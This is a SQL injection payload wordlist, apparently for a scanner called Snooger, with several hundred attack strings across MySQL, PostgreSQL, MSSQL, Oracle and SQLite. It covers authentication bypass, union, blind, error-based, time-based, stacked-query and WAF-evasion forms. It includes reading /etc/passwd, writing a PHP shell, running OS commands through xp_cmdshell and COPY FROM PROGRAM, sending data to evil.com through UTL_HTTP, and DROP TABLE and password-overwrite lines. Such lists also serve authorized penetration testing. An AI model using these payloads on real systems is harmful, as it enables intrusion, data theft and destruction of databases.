# Snooger SQLi Payloads — 300+ real payloads for MySQL, PostgreSQL, MSSQL, Oracle, SQLite
# Categories: Auth Bypass, Union, Boolean, Error, Time, Stacked, WAF Bypass
# ================================================================================

# === Authentication Bypass ===
' OR 1=1--
' OR 1=1#
' OR 1=1/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
" OR 1=1--
" OR "1"="1
" OR "1"="1"--
admin'--
admin'#
admin'/*
' OR 1=1 LIMIT 1--
') OR 1=1--
')) OR 1=1--
') OR ('1'='1
' OR 1=1; --
1' OR '1' = '1
1' OR '1' = '1'))/*
' UNION SELECT 1--
' OR 1#
'='
'LIKE'
\' OR 1=1--
' OR 1=1 %00
admin' --
admin' #
admin'/*
') OR ('x'='x
') OR ('1'='1'--
' OR 'x'='x
' OR ''='
' OR 1<2--
' OR 1 BETWEEN 1 AND 1--
' OR id>0--

# === Union-Based Detection ===
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
" UNION SELECT NULL--
" UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,4,5--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--

# === MySQL Specific ===
' UNION SELECT @@version--
' UNION SELECT user()--
' UNION SELECT database()--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT CONCAT(username,0x3a,password) FROM users--
' UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2 INTO OUTFILE '/var/www/html/shell.php'--
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
' AND (SELECT SUBSTR(@@version,1,1))='5'--
' AND ORD(MID((SELECT IFNULL(CAST(database() AS NCHAR),0x20)),1,1))>64--
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
' AND EXP(~(SELECT * FROM (SELECT user())x))--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(@@version)) USING utf8)))--
' AND GTID_SUBSET(CONCAT(@@version),1)--

# === MySQL Time-Based ===
' AND SLEEP(5)--
' AND SLEEP(5)#
' OR SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
' AND (SELECT SLEEP(5) FROM dual WHERE 1=1)--
' OR IF(1=1,SLEEP(5),0)#
' AND BENCHMARK(10000000,SHA1('test'))--
1' WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'--
1; WAITFOR DELAY '0:0:5'--

# === PostgreSQL Specific ===
' UNION SELECT version()--
' UNION SELECT current_user--
' UNION SELECT current_database()--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
'; SELECT pg_sleep(5)--
' AND (SELECT pg_sleep(5))--
' OR 1=1; SELECT pg_sleep(5)--
' AND CAST(version() AS int)=1--
' AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) AS int)--
' UNION SELECT null,null,CAST(version() AS text)--
'; COPY (SELECT '') TO PROGRAM 'id'--
'; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'--
' AND (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))=current_user--
' AND SUBSTRING(version(),1,2)='14'--
'||(SELECT version())||'
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--

# === MSSQL Specific ===
' UNION SELECT @@version--
' UNION SELECT name FROM master..sysdatabases--
' UNION SELECT name FROM sysobjects WHERE xtype='U'--
' UNION SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users')--
'; WAITFOR DELAY '0:0:5'--
'; EXEC xp_cmdshell('whoami')--
'; EXEC master..xp_cmdshell 'dir c:\'--
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE--
' AND 1=CONVERT(int,@@version)--
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
'; SELECT * FROM OPENROWSET('SQLOLEDB','server=evil.com;uid=sa;pwd=;database=master')--
' HAVING 1=1--
' GROUP BY 1--
' ORDER BY 1--

# === Oracle Specific ===
' UNION SELECT banner FROM v$version WHERE ROWNUM=1--
' UNION SELECT user FROM dual--
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
' UNION SELECT UTL_HTTP.REQUEST('http://evil.com/?data='||user) FROM dual--
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual))--
' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5)=1--
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))--
' AND XMLType((SELECT banner FROM v$version WHERE ROWNUM=1))=1--
' AND (SELECT CASE WHEN (1=1) THEN 'a'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5) ELSE NULL END FROM dual) IS NOT NULL--

# === SQLite Specific ===
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name FROM sqlite_master WHERE type='table'--
' UNION SELECT group_concat(sql) FROM sqlite_master--
' AND RANDOMBLOB(100000000/0)--
' AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000/2))))--

# === Boolean-Based Blind ===
' AND 1=1--
' AND 1=2--
' AND 'a'='a
' AND 'a'='b
' AND SUBSTRING(@@version,1,1)='5'--
' AND (SELECT COUNT(*) FROM users)>0--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>96--
' AND (SELECT LENGTH(database()))=4--
' OR 1=1 AND 1=1--
' OR 1=1 AND 1=2--
1 AND 1=1
1 AND 1=2
1 OR 1=1
1 OR 1=2
1' AND '1'='1
1' AND '1'='2

# === Error-Based ===
' AND 1=1 UNION ALL SELECT 1,2,3,@@version--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,version(),0x7e))--
' AND UPDATEXML(1,CONCAT(0x7e,version(),0x7e),1)--
' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM (SELECT 1 UNION SELECT 2)a GROUP BY x LIMIT 1)--
' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) AS x)--
' AND POLYGON((SELECT * FROM (SELECT * FROM (SELECT CONCAT(version()))a)b))--
' AND LINESTRING((SELECT * FROM (SELECT * FROM (SELECT CONCAT(version()))a)b))--

# === Stacked Queries ===
'; DROP TABLE users--
'; INSERT INTO users(username,password) VALUES('hacked','hacked')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
'; SELECT * INTO dumpfile '/tmp/dump.txt' FROM users--

# === WAF Bypass Techniques ===
/*!50000union*/+/*!50000select*/+1,2,3--
UnIoN SeLeCt 1,2,3--
uni%6fn se%6cect 1,2,3--
UNI%4FN SEL%45CT 1,2,3--
uNiOn aLl SeLeCt 1,2,3--
%55nion %53elect 1,2,3--
UNION%0aSELECT%0a1,2,3--
UNION%0dSELECT%0d1,2,3--
UNION%09SELECT%091,2,3--
UN/**/ION SEL/**/ECT 1,2,3--
UNION%23%0aSELECT 1,2,3--
' /*!UNION*/ /*!SELECT*/ 1,2,3--
' %55NION/**/%53ELECT 1,2,3--
' UNION(SELECT(1),(2),(3))--
' UniOn SeLeCt 1,2,3--
' union distinctROW select 1,2,3--
' AND 1=1 /*!UNION*/ /*!ALL*/ /*!SELECT*/ 1,2,3--
' OR 1 /*!UNION*/ /*!ALL*/ /*!SELECT*/ 1,2,3--
%27%20UNION%20SELECT%201,2,3--
%27%20OR%201=1--
' OR 1=1-- -
' OR 1=1;%00
'%20OR%20'1'='1
' oR '1'='1
'/**/OR/**/1=1--
' OR 1=1 --
' || 1=1--
'%09OR%091=1--
' &&1=1--

# === Numeric / Integer Context ===
1 OR 1=1
1 AND 1=1 UNION SELECT 1,2,3--
1 AND (SELECT * FROM users)=1--
0 UNION SELECT 1,2,3--
-1 UNION SELECT 1,2,3--
-1' UNION SELECT 1,2,3--
99999 UNION SELECT 1,2,3--

# === Header Injection Points ===
X-Forwarded-For: ' OR 1=1--
Referer: ' OR 1=1--
Cookie: session=' UNION SELECT 1--
User-Agent: ' OR 1=1-- -
X-Custom-IP-Authorization: ' UNION SELECT @@version--

# === JSON/API Context ===
{"username":"admin' OR 1=1--","password":"x"}
{"id":"1 UNION SELECT 1,2,3--"}
{"search":"' OR 1=1#"}
{"query":"' AND (SELECT SLEEP(5))--"}

# === Second Order / Stored ===
admin'--
test' UNION SELECT 1,2,3--
hacker'; DROP TABLE sessions--
user' AND 1=1--
